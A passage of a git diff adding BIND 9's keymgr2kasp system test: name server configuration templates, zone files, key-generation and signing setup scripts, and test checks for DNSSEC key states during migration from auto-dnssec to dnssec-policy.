allow-update { any; }; + dnssec-policy "timing-metadata"; +}; + +zone "migrate-nomatch-algnum.kasp" { + type primary; + file "migrate-nomatch-algnum.kasp.db"; + allow-update { any; }; + dnssec-policy "migrate-nomatch-algnum"; +}; + +zone "migrate-nomatch-alglen.kasp" { + type primary; + file "migrate-nomatch-alglen.kasp.db"; + allow-update { any; }; + dnssec-policy "migrate-nomatch-alglen"; +}; diff --git a/bin/tests/system/keymgr2kasp/ns3/setup.sh b/bin/tests/system/keymgr2kasp/ns3/setup.sh new file mode 100644 index 0000000..6c1d0a5 --- /dev/null +++ b/bin/tests/system/keymgr2kasp/ns3/setup.sh @@ -0,0 +1,131 @@ +#!/bin/sh -e + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +# shellcheck source=conf.sh +. ../../conf.sh + +echo_i "ns3/setup.sh" + +setup() { + zone="$1" + echo_i "setting up zone: $zone" + zonefile="${zone}.db" + infile="${zone}.db.infile" +} + +# Make lines shorter by storing key states in environment variables. +H="HIDDEN" +R="RUMOURED" +O="OMNIPRESENT" +U="UNRETENTIVE" + +# Set up a zone with auto-dnssec maintain to migrate to dnssec-policy. +setup migrate.kasp +echo "$zone" >> zones +ksktimes="-P now -A now -P sync now" +zsktimes="-P now -A now" +KSK=$($KEYGEN -a $DEFAULT_ALGORITHM -L 7200 -f KSK $ksktimes $zone 2> keygen.out.$zone.1) +ZSK=$($KEYGEN -a $DEFAULT_ALGORITHM -L 7200 $zsktimes $zone 2> keygen.out.$zone.2) +cat template.db.in "${KSK}.key" "${ZSK}.key" > "$infile" +private_type_record $zone $DEFAULT_ALGORITHM_NUMBER "$KSK" >> "$infile" +private_type_record $zone $DEFAULT_ALGORITHM_NUMBER "$ZSK" >> "$infile" +$SIGNER -S -x -s now-1h -e now+2w -o $zone -O full -f $zonefile $infile > signer.out.$zone.1 2>&1 + +# Set up Single-Type Signing Scheme zones with auto-dnssec maintain to +# migrate to dnssec-policy. This is a zone that has 'update-check-ksk no;' +# configured, meaning the zone is signed with a single CSK. +setup csk.kasp +echo "$zone" >> zones +csktimes="-P now -A now -P sync now" +CSK=$($KEYGEN -a $DEFAULT_ALGORITHM -L 7200 -f KSK $csktimes $zone 2> keygen.out.$zone.1) +cat template.db.in "${CSK}.key" > "$infile" +private_type_record $zone $DEFAULT_ALGORITHM_NUMBER "$CSK" >> "$infile" +$SIGNER -S -z -s now-1h -e now+2w -o $zone -O full -f $zonefile $infile > signer.out.$zone.1 2>&1 + +setup csk-nosep.kasp +echo "$zone" >> zones +csktimes="-P now -A now -P sync now" +CSK=$($KEYGEN -a $DEFAULT_ALGORITHM -L 7200 $csktimes $zone 2> keygen.out.$zone.1) +cat template.db.in "${CSK}.key" > "$infile" +private_type_record $zone $DEFAULT_ALGORITHM_NUMBER "$CSK" >> "$infile" +$SIGNER -S -z -s now-1h -e now+2w -o $zone -O full -f $zonefile $infile > signer.out.$zone.1 2>&1 + +# Set up a zone with auto-dnssec maintain to migrate to dnssec-policy, but this +# time the existing keys do not match the policy. The existing keys are +# RSASHA256 keys, and will be migrated to a dnssec-policy that dictates +# ECDSAP256SHA256 keys. +setup migrate-nomatch-algnum.kasp +echo "$zone" >> zones +Tds="now-3h" # Time according to dnssec-policy that DS will be OMNIPRESENT +Tkey="now-3900s" # DNSKEY TTL + propagation delay +Tsig="now-12h" # Zone's maximum TTL + propagation delay +ksktimes="-P ${Tkey} -A ${Tkey} -P sync ${Tds}" +zsktimes="-P ${Tkey} -A ${Tsig}" +KSK=$($KEYGEN -a RSASHA256 -b 2048 -L 300 -f KSK $ksktimes $zone 2> keygen.out.$zone.1) +ZSK=$($KEYGEN -a RSASHA256 -b 2048 -L 300 $zsktimes $zone 2> keygen.out.$zone.2) +cat template.db.in "${KSK}.key" "${ZSK}.key" > "$infile" +private_type_record $zone 5 "$KSK" >> "$infile" +private_type_record $zone 5 "$ZSK" >> "$infile" +$SIGNER -S -x -s now-1h -e now+2w -o $zone -O full -f $zonefile $infile > signer.out.$zone.1 2>&1 + +# Set up a zone with auto-dnssec maintain to migrate to dnssec-policy, but this +# time the existing keys do not match the policy. The existing keys are +# 2048 bits RSASHA256 keys, and will be migrated to a dnssec-policy that +# dictates 3072 bits RSASHA256 keys. +setup migrate-nomatch-alglen.kasp +echo "$zone" >> zones +Tds="now-3h" # Time according to dnssec-policy that DS will be OMNIPRESENT +Tkey="now-3900s" # DNSKEY TTL + propagation delay +Tsig="now-12h" # Zone's maximum TTL + propagation delay +ksktimes="-P ${Tkey} -A ${Tkey} -P sync ${Tds}" +zsktimes="-P ${Tkey} -A ${Tsig}" +KSK=$($KEYGEN -a RSASHA256 -b 2048 -L 300 -f KSK $ksktimes $zone 2> keygen.out.$zone.1) +ZSK=$($KEYGEN -a RSASHA256 -b 2048 -L 300 $zsktimes $zone 2> keygen.out.$zone.2) +cat template.db.in "${KSK}.key" "${ZSK}.key" > "$infile" +private_type_record $zone 5 "$KSK" >> "$infile" +private_type_record $zone 5 "$ZSK" >> "$infile" +$SIGNER -S -x -s now-1h -e now+2w -o $zone -O full -f $zonefile $infile > signer.out.$zone.1 2>&1 + +# +# Set up zones to test time metadata correctly sets state. +# + +# Key states expected to be rumoured after migration. +setup rumoured.kasp +echo "$zone" >> zones +Tds="now-2h" +Tkey="now-300s" +Tsig="now-11h" +ksktimes="-P ${Tkey} -A ${Tkey} -P sync ${Tds}" +zsktimes="-P ${Tkey} -A ${Tsig}" +KSK=$($KEYGEN -a $DEFAULT_ALGORITHM -L 300 -f KSK $ksktimes $zone 2> keygen.out.$zone.1) +ZSK=$($KEYGEN -a $DEFAULT_ALGORITHM -L 300 $zsktimes $zone 2> keygen.out.$zone.2) +cat template.db.in "${KSK}.key" "${ZSK}.key" > "$infile" +private_type_record $zone $DEFAULT_ALGORITHM_NUMBER "$KSK" >> "$infile" +private_type_record $zone $DEFAULT_ALGORITHM_NUMBER "$ZSK" >> "$infile" +$SIGNER -S -x -s now-1h -e now+2w -o $zone -O full -f $zonefile $infile > signer.out.$zone.1 2>&1 + +# Key states expected to be omnipresent after migration. +setup omnipresent.kasp +echo "$zone" >> zones +Tds="now-3h" # Time according to dnssec-policy that DS will be OMNIPRESENT +Tkey="now-3900s" # DNSKEY TTL + propagation delay +Tsig="now-12h" # Zone's maximum TTL + propagation delay +ksktimes="-P ${Tkey} -A ${Tkey} -P sync ${Tds}" +zsktimes="-P ${Tkey} -A ${Tsig}" +KSK=$($KEYGEN -a $DEFAULT_ALGORITHM -L 300 -f KSK $ksktimes $zone 2> keygen.out.$zone.1) +ZSK=$($KEYGEN -a $DEFAULT_ALGORITHM -L 300 $zsktimes $zone 2> keygen.out.$zone.2) +cat template.db.in "${KSK}.key" "${ZSK}.key" > "$infile" +private_type_record $zone $DEFAULT_ALGORITHM_NUMBER "$KSK" >> "$infile" +private_type_record $zone $DEFAULT_ALGORITHM_NUMBER "$ZSK" >> "$infile" +$SIGNER -S -x -s now-1h -e now+2w -o $zone -O full -f $zonefile $infile > signer.out.$zone.1 2>&1 diff --git a/bin/tests/system/keymgr2kasp/ns3/template.db.in b/bin/tests/system/keymgr2kasp/ns3/template.db.in new file mode 100644 index 0000000..010b05b --- /dev/null +++ b/bin/tests/system/keymgr2kasp/ns3/template.db.in @@ -0,0 +1,27 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 +@ IN SOA mname1. . ( + 1 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + + NS ns3 +ns3 A 10.53.0.3 + +a A 10.0.0.1 +b A 10.0.0.2 +c A 10.0.0.3 + diff --git a/bin/tests/system/keymgr2kasp/ns4/named.conf.in b/bin/tests/system/keymgr2kasp/ns4/named.conf.in new file mode 100644 index 0000000..e478404 --- /dev/null +++ b/bin/tests/system/keymgr2kasp/ns4/named.conf.in @@ -0,0 +1,72 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +// NS4 + +options { + query-source address 10.53.0.4; + notify-source 10.53.0.4; + transfer-source 10.53.0.4; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.4; }; + listen-on-v6 { none; }; + allow-transfer { any; }; + recursion no; + key-directory "."; +}; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.4 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +key "external" { + algorithm @DEFAULT_HMAC@; + secret "YPfMoAk6h+3iN8MDRQC004iSNHY="; +}; + +key "internal" { + algorithm @DEFAULT_HMAC@; + secret "4xILSZQnuO1UKubXHkYUsvBRPu8="; +}; + +view "ext" { + match-clients { key "external"; }; + + zone "view-rsasha256.kasp" { + type master; + file "view-rsasha256.kasp.ext.db"; + auto-dnssec maintain; + inline-signing yes; + dnssec-dnskey-kskonly yes; + update-check-ksk yes; + }; +}; + +view "int" { + match-clients { key "internal"; }; + + zone "view-rsasha256.kasp" { + type master; + file "view-rsasha256.kasp.int.db"; + auto-dnssec maintain; + inline-signing yes; + dnssec-dnskey-kskonly yes; + update-check-ksk yes; + }; +}; diff --git a/bin/tests/system/keymgr2kasp/ns4/named2.conf.in b/bin/tests/system/keymgr2kasp/ns4/named2.conf.in new file mode 100644 index 0000000..538aedc --- /dev/null +++ b/bin/tests/system/keymgr2kasp/ns4/named2.conf.in @@ -0,0 +1,89 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +// NS4 + +options { + query-source address 10.53.0.4; + notify-source 10.53.0.4; + transfer-source 10.53.0.4; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.4; }; + listen-on-v6 { none; }; + allow-transfer { any; }; + recursion no; + key-directory "."; +}; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.4 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +dnssec-policy "rsasha256" { + keys { + zsk key-directory lifetime P3M algorithm 8 2048; + ksk key-directory lifetime P1Y algorithm 8 2048; + }; + + dnskey-ttl 300; + publish-safety 1h; + retire-safety 1h; + + signatures-refresh 5d; + signatures-validity 14d; + signatures-validity-dnskey 14d; + + max-zone-ttl 1d; + zone-propagation-delay 300; + + parent-ds-ttl 86400; + parent-propagation-delay 3h; +}; + +key "external" { + algorithm @DEFAULT_HMAC@; + secret "YPfMoAk6h+3iN8MDRQC004iSNHY="; +}; + +key "internal" { + algorithm @DEFAULT_HMAC@; + secret "4xILSZQnuO1UKubXHkYUsvBRPu8="; +}; + +view "ext" { + match-clients { key "external"; }; + + zone "view-rsasha256.kasp" { + type master; + file "view-rsasha256.kasp.ext.db"; + inline-signing yes; + dnssec-policy "rsasha256"; + }; +}; + +view "int" { + match-clients { key "internal"; }; + + zone "view-rsasha256.kasp" { + type master; + file "view-rsasha256.kasp.int.db"; + inline-signing yes; + dnssec-policy "rsasha256"; + }; +}; diff --git a/bin/tests/system/keymgr2kasp/ns4/setup.sh b/bin/tests/system/keymgr2kasp/ns4/setup.sh new file mode 100644 index 0000000..63121a0 --- /dev/null +++ b/bin/tests/system/keymgr2kasp/ns4/setup.sh @@ -0,0 +1,46 @@ +#!/bin/sh -e + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +# shellcheck source=conf.sh +. ../../conf.sh + +echo_i "ns4/setup.sh" + +# Make lines shorter by storing key states in environment variables. +H="HIDDEN" +R="RUMOURED" +O="OMNIPRESENT" +U="UNRETENTIVE" + +zone="view-rsasha256.kasp" +algo="RSASHA256" +num="8" +echo "$zone" >> zones + +# Set up zones in views with auto-dnssec maintain to migrate to dnssec-policy. +# The keys for these zones are in use long enough that they should start a +# rollover for the ZSK (P3M), but not long enough to initiate a KSK rollover (P1Y). +ksktimes="-P -186d -A -186d -P sync -186d" +zsktimes="-P -186d -A -186d" +KSK=$($KEYGEN -a $algo -L 300 -b 2048 -f KSK $ksktimes $zone 2> keygen.out.$zone.1) +ZSK=$($KEYGEN -a $algo -L 300 -b 2048 $zsktimes $zone 2> keygen.out.$zone.2) + +echo_i "setting up zone $zone (external)" +view="ext" +zonefile="${zone}.${view}.db" +cat template.$view.db.in "${KSK}.key" "${ZSK}.key" > "$zonefile" + +echo_i "setting up zone $zone (internal)" +view="int" +zonefile="${zone}.${view}.db" +cat template.$view.db.in "${KSK}.key" "${ZSK}.key" > "$zonefile" diff --git a/bin/tests/system/keymgr2kasp/ns4/template.ext.db.in b/bin/tests/system/keymgr2kasp/ns4/template.ext.db.in new file mode 100644 index 0000000..eecda2f --- /dev/null +++ b/bin/tests/system/keymgr2kasp/ns4/template.ext.db.in @@ -0,0 +1,24 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 +@ IN SOA mname1. . ( + 1 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + + NS ns4 +ns4 A 10.53.0.4 + +view TXT "external" diff --git a/bin/tests/system/keymgr2kasp/ns4/template.int.db.in b/bin/tests/system/keymgr2kasp/ns4/template.int.db.in new file mode 100644 index 0000000..3783d64 --- /dev/null +++ b/bin/tests/system/keymgr2kasp/ns4/template.int.db.in @@ -0,0 +1,24 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 +@ IN SOA mname1. . ( + 1 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + + NS ns4 +ns4 A 10.53.0.4 + +view TXT "internal" diff --git a/bin/tests/system/keymgr2kasp/setup.sh b/bin/tests/system/keymgr2kasp/setup.sh new file mode 100644 index 0000000..e43f798 --- /dev/null +++ b/bin/tests/system/keymgr2kasp/setup.sh @@ -0,0 +1,34 @@ +#!/bin/sh -e + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +# shellcheck source=conf.sh +. ../conf.sh + +set -e + +$SHELL clean.sh + +copy_setports ns3/named.conf.in ns3/named.conf +copy_setports ns4/named.conf.in ns4/named.conf + +copy_setports ns3/kasp.conf.in ns3/kasp.conf + +# Setup zones +( + cd ns3 + $SHELL setup.sh +) +( + cd ns4 + $SHELL setup.sh +) diff --git a/bin/tests/system/keymgr2kasp/tests.sh b/bin/tests/system/keymgr2kasp/tests.sh new file mode 100644 index 0000000..62b58a7 --- /dev/null +++ b/bin/tests/system/keymgr2kasp/tests.sh @@ -0,0 +1,1137 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +# shellcheck source=conf.sh +. ../conf.sh +# shellcheck source=kasp.sh +. ../kasp.sh + +start_time="$(TZ=UTC date +%s)" +status=0 +n=0 + +############################################################################### +# Utilities # +############################################################################### + +# Call dig with default options. +dig_with_opts() { + + if [ -n "$TSIG" ]; then + "$DIG" +tcp +noadd +nosea +nostat +nocmd +dnssec -p "$PORT" -y "$TSIG" "$@" + else + "$DIG" +tcp +noadd +nosea +nostat +nocmd +dnssec -p "$PORT" "$@" + fi +} + +# Log error and increment failure rate. +log_error() { + echo_i "error: $1" + ret=$((ret+1)) +} + +# Default next key event threshold. May be extended by wait periods. +next_key_event_threshold=100 + +############################################################################### +# Tests # +############################################################################### + +set_retired_removed() { + _Lkey=$2 + _Iret=$3 + + _active=$(key_get $1 ACTIVE) + set_addkeytime "${1}" "RETIRED" "${_active}" "${_Lkey}" + _retired=$(key_get $1 RETIRED) + set_addkeytime "${1}" "REMOVED" "${_retired}" "${_Iret}" +} + +rollover_predecessor_keytimes() { + _addtime=$1 + + _created=$(key_get KEY1 CREATED) + + set_addkeytime "KEY1" "PUBLISHED" "${_created}" "${_addtime}" + set_addkeytime "KEY1" "SYNCPUBLISH" "${_created}" "${_addtime}" + set_addkeytime "KEY1" "ACTIVE" "${_created}" "${_addtime}" + [ "$Lksk" = 0 ] || set_retired_removed "KEY1" "${Lksk}" "${IretKSK}" + + _created=$(key_get KEY2 CREATED) + set_addkeytime "KEY2" "PUBLISHED" "${_created}" "${_addtime}" + set_addkeytime "KEY2" "ACTIVE" "${_created}" "${_addtime}" + [ "$Lzsk" = 0 ] || set_retired_removed "KEY2" "${Lzsk}" "${IretZSK}" +} + +# Policy parameters. +# Lksk: unlimited +# Lzsk: unlimited +Lksk=0 +Lzsk=0 + + +################################################# +# Test state before switching to dnssec-policy. # +################################################# + +# Set expected key properties for migration tests. +# $1 $2: Algorithm number and string. +# $3 $4: KSK and ZSK size. +init_migration_keys() { + key_clear "KEY1" + key_set "KEY1" "LEGACY" "yes" + set_keyrole "KEY1" "ksk" + set_keylifetime "KEY1" "none" + set_keyalgorithm "KEY1" "$1" "$2" "$3" + set_keysigning "KEY1" "yes" + set_zonesigning "KEY1" "no" + + key_clear "KEY2" + key_set "KEY2" "LEGACY" "yes" + set_keyrole "KEY2" "zsk" + set_keylifetime "KEY2" "none" + set_keyalgorithm "KEY2" "$1" "$2" "$4" + set_keysigning "KEY2" "no" + set_zonesigning "KEY2" "yes" + + key_clear "KEY3" + key_clear "KEY4" +} + +# Set expected key states for migration tests. +# $1: Goal +# $2: States +init_migration_states() { + set_keystate "KEY1" "GOAL" "$1" + set_keystate "KEY1" "STATE_DNSKEY" "$2" + set_keystate "KEY1" "STATE_KRRSIG" "$2" + set_keystate "KEY1" "STATE_DS" "$2" + + set_keystate "KEY2" "GOAL" "$1" + set_keystate "KEY2" "STATE_DNSKEY" "$2" + set_keystate "KEY2" "STATE_ZRRSIG" "$2" +} + +# +# Testing a good migration. +# +set_zone "migrate.kasp" +set_policy "none" "2" "7200" +set_server "ns3" "10.53.0.3" + +init_migration_keys "$DEFAULT_ALGORITHM_NUMBER" "$DEFAULT_ALGORITHM" "$DEFAULT_BITS" "$DEFAULT_BITS" +init_migration_states "omnipresent" "rumoured" + +# Make sure the zone is signed with legacy keys. +check_keys +check_dnssecstatus "$SERVER" "$POLICY" "$ZONE" +# These keys are immediately published and activated. +rollover_predecessor_keytimes 0 +check_keytimes +check_apex +check_subdomain +dnssec_verify +# Remember legacy key tags. +_migrate_ksk=$(key_get KEY1 ID) +_migrate_zsk=$(key_get KEY2 ID) + +# +# Testing a good migration (CSK). +# +set_zone "csk.kasp" +set_policy "none" "1" "7200" +set_server "ns3" "10.53.0.3" + +key_clear "KEY1" +key_set "KEY1" "LEGACY" "yes" +set_keyrole "KEY1" "ksk" +# This key also acts as a ZSK. +key_set "KEY1" "ZSK" "yes" +set_keylifetime "KEY1" "none" +set_keyalgorithm "KEY1" "$DEFAULT_ALGORITHM_NUMBER" "$DEFAULT_ALGORITHM" "$DEFAULT_BITS" "$DEFAULT_BITS" +set_keysigning "KEY1" "yes" +set_zonesigning "KEY1" "yes" + +set_keystate "KEY1" "GOAL" "omnipresent" +set_keystate "KEY1" "STATE_DNSKEY" "rumoured" +set_keystate "KEY1" "STATE_KRRSIG" "rumoured" +set_keystate "KEY1" "STATE_ZRRSIG" "rumoured" +set_keystate "KEY1" "STATE_DS" "rumoured" + +key_clear "KEY2" +key_clear "KEY3" +key_clear "KEY4" + +# Make sure the zone is signed with legacy key. +check_keys +check_dnssecstatus "$SERVER" "$POLICY" "$ZONE" +# The key is immediately published and activated. +_created=$(key_get KEY1 CREATED) +set_keytime "KEY1" "PUBLISHED" "${_created}" +set_keytime "KEY1" "SYNCPUBLISH" "${_created}" +set_keytime "KEY1" "ACTIVE" "${_created}" + +check_keytimes +check_apex +check_subdomain +dnssec_verify +# Remember legacy key tags. +_migrate_csk=$(key_get KEY1 ID) + +# +# Testing a good migration (CSK, no SEP). +# +set_zone "csk-nosep.kasp" +set_policy "none" "1" "7200" +set_server "ns3" "10.53.0.3" + +key_clear "KEY1" +key_set "KEY1" "LEGACY" "yes" +set_keyrole "KEY1" "zsk" +# Despite the missing SEP bit, this key also acts as a KSK. +key_set "KEY1" "KSK" "yes" +set_keylifetime "KEY1" "none" +set_keyalgorithm "KEY1" "$DEFAULT_ALGORITHM_NUMBER" "$DEFAULT_ALGORITHM" "$DEFAULT_BITS" "$DEFAULT_BITS" +set_keysigning "KEY1" "yes" +set_zonesigning "KEY1" "yes" + +set_keystate "KEY1" "GOAL" "omnipresent" +set_keystate "KEY1" "STATE_DNSKEY" "rumoured" +set_keystate "KEY1" "STATE_KRRSIG" "rumoured" +set_keystate "KEY1" "STATE_ZRRSIG" "rumoured" +set_keystate "KEY1" "STATE_DS" "rumoured" + +key_clear "KEY2" +key_clear "KEY3" +key_clear "KEY4" + +# Make sure the zone is signed with legacy key. +check_keys +check_dnssecstatus "$SERVER" "$POLICY" "$ZONE" +# The key is immediately published and activated. +_created=$(key_get KEY1 CREATED) +set_keytime "KEY1" "PUBLISHED" "${_created}" +set_keytime "KEY1" "SYNCPUBLISH" "${_created}" +set_keytime "KEY1" "ACTIVE" "${_created}" + +check_keytimes +check_apex +check_subdomain +dnssec_verify +# Remember legacy key tags. +_migrate_csk_nosep=$(key_get KEY1 ID) + +# +# Testing key states derived from key timing metadata (rumoured). +# +set_zone "rumoured.kasp" +set_policy "none" "2" "300" +set_server "ns3" "10.53.0.3" + +init_migration_keys "$DEFAULT_ALGORITHM_NUMBER" "$DEFAULT_ALGORITHM" "$DEFAULT_BITS" "$DEFAULT_BITS" +init_migration_states "omnipresent" "rumoured" + +# Make sure the zone is signed with legacy keys. +check_keys +check_dnssecstatus "$SERVER" "$POLICY" "$ZONE" +check_apex +check_subdomain +dnssec_verify +# Remember legacy key tags. +_rumoured_ksk=$(key_get KEY1 ID) +_rumoured_zsk=$(key_get KEY2 ID) + +# +# Testing key states derived from key timing metadata (omnipresent). +# +set_zone "omnipresent.kasp" +set_policy "none" "2" "300" +set_server "ns3" "10.53.0.3" + +init_migration_keys "$DEFAULT_ALGORITHM_NUMBER" "$DEFAULT_ALGORITHM" "$DEFAULT_BITS" "$DEFAULT_BITS" +init_migration_states "omnipresent" "omnipresent" + +# Make sure the zone is signed with legacy keys. +check_keys +check_dnssecstatus "$SERVER" "$POLICY" "$ZONE" +check_apex +check_subdomain +dnssec_verify +# Remember legacy key tags. +_omnipresent_ksk=$(key_get KEY1 ID) +_omnipresent_zsk=$(key_get KEY2 ID) + +# +# Testing migration with unmatched existing keys (different algorithm). +# +set_zone "migrate-nomatch-algnum.kasp" +set_policy "none" "2" "300" +set_server "ns3" "10.53.0.3" + +init_migration_keys "8" "RSASHA256" "2048" "2048" +init_migration_states "omnipresent" "omnipresent" + +# Make sure the zone is signed with legacy keys. +check_keys +check_dnssecstatus "$SERVER" "$POLICY" "$ZONE" + +# The KSK is immediately published and activated. +# -P : now-3900s +# -P sync: now-3h +# -A : now-3900s +created=$(key_get KEY1 CREATED) +set_addkeytime "KEY1" "PUBLISHED" "${created}" -3900 +set_addkeytime "KEY1" "ACTIVE" "${created}" -3900 +set_addkeytime "KEY1" "SYNCPUBLISH" "${created}" -10800 +# The ZSK is immediately published and activated. +# -P: now-3900s +# -A: now-12h +created=$(key_get KEY2 CREATED) +set_addkeytime "KEY2" "PUBLISHED" "${created}" -3900 +set_addkeytime "KEY2" "ACTIVE" "${created}" -43200 +check_keytimes +check_apex +check_subdomain +dnssec_verify + +# Remember legacy key tags. +_migratenomatch_algnum_ksk=$(key_get KEY1 ID) +_migratenomatch_algnum_zsk=$(key_get KEY2 ID) + +# +# Testing migration with unmatched existing keys (different length). +# +set_zone "migrate-nomatch-alglen.kasp" +set_policy "none" "2" "300" +set_server "ns3" "10.53.0.3" + +init_migration_keys "8" "RSASHA256" "2048" "2048" +init_migration_states "omnipresent" "omnipresent" + +# Make sure the zone is signed with legacy keys. +check_keys +check_dnssecstatus "$SERVER" "$POLICY" "$ZONE" + +# Set expected key times: +# - The KSK is immediately published and activated. +# P : now-3900s +# P sync: now-3h +# A : now-3900s +created=$(key_get KEY1 CREATED) +set_addkeytime "KEY1" "PUBLISHED" "${created}" -3900 +set_addkeytime "KEY1" "ACTIVE" "${created}" -3900 +set_addkeytime "KEY1" "SYNCPUBLISH" "${created}" -10800 +# - The ZSK is immediately published and activated. +# P: now-3900s +# A: now-12h +created=$(key_get KEY2 CREATED) +set_addkeytime "KEY2" "PUBLISHED" "${created}" -3900 +set_addkeytime "KEY2" "ACTIVE" "${created}" -43200 +check_keytimes +check_apex +check_subdomain +dnssec_verify + +# Remember legacy key tags. +_migratenomatch_alglen_ksk=$(key_get KEY1 ID) +_migratenomatch_alglen_zsk=$(key_get KEY2 ID) + + +############# +# Reconfig. # +############# +echo_i "reconfig (migration to dnssec-policy)" +copy_setports ns3/named2.conf.in ns3/named.conf +rndc_reconfig ns3 10.53.0.3 + +# Calculate time passed to correctly check for next key events. +now="$(TZ=UTC date +%s)" +time_passed=$((now-start_time)) +echo_i "${time_passed} seconds passed between start of tests and reconfig" + +# Wait until we have seen "zone_rekey done:" message for this key. +_wait_for_done_signing() { + _zone=$1 + + _ksk=$(key_get $2 KSK) + _zsk=$(key_get $2 ZSK) + if [ "$_ksk" = "yes" ]; then + _role="KSK" + _expect_type=EXPECT_KRRSIG + elif [ "$_zsk" = "yes" ]; then + _role="ZSK" + _expect_type=EXPECT_ZRRSIG + fi + + if [ "$(key_get ${2} $_expect_type)" = "yes" ] && [ "$(key_get $2 $_role)" = "yes" ]; then + _keyid=$(key_get $2 ID) + _keyalg=$(key_get $2 ALG_STR) + echo_i "wait for zone ${_zone} is done signing with $2 ${_zone}/${_keyalg}/${_keyid}" + grep "zone_rekey done: key ${_keyid}/${_keyalg}" "${DIR}/named.run" > /dev/null || return 1 + fi + + return 0 +} +wait_for_done_signing() { + n=$((n+1)) + echo_i "wait for zone ${ZONE} is done signing ($n)" + ret=0 + + retry_quiet 30 _wait_for_done_signing ${ZONE} KEY1 || ret=1 + retry_quiet 30 _wait_for_done_signing ${ZONE} KEY2 || ret=1 + retry_quiet 30 _wait_for_done_signing ${ZONE} KEY3 || ret=1 + retry_quiet 30 _wait_for_done_signing ${ZONE} KEY4 || ret=1 + + test "$ret" -eq 0 || echo_i "failed" + status=$((status+ret)) +} + + +################################################ +# Test state after switching to dnssec-policy. # +################################################ + +# Policy parameters. +# ZSK now has lifetime of 60 days (5184000 seconds). +# The key is removed after Iret = TTLsig + Dprp + Dsgn + retire-safety. +Lzsk=5184000 +IretZSK=867900 + +# +# Testing good migration. +# +set_zone "migrate.kasp" +set_policy "migrate" "2" "7200" +set_server "ns3" "10.53.0.3" + +# Key properties, timings and metadata should be the same as legacy keys above. +# However, because the zsk has a lifetime, kasp will set the retired time. +init_migration_keys "$DEFAULT_ALGORITHM_NUMBER" "$DEFAULT_ALGORITHM" "$DEFAULT_BITS" "$DEFAULT_BITS" +init_migration_states "omnipresent" "rumoured" +key_set "KEY1" "LEGACY" "no" +key_set "KEY2" "LEGACY" "no" +set_keylifetime "KEY1" "${Lksk}" +set_keylifetime "KEY2" "${Lzsk}" + +# Various signing policy checks. +check_keys +wait_for_done_signing +check_dnssecstatus "$SERVER" "$POLICY" "$ZONE" + +# Set expected key times: +rollover_predecessor_keytimes 0 + +# - Key now has lifetime of 60 days (5184000 seconds). +# The key is removed after Iret = TTLsig + Dprp + 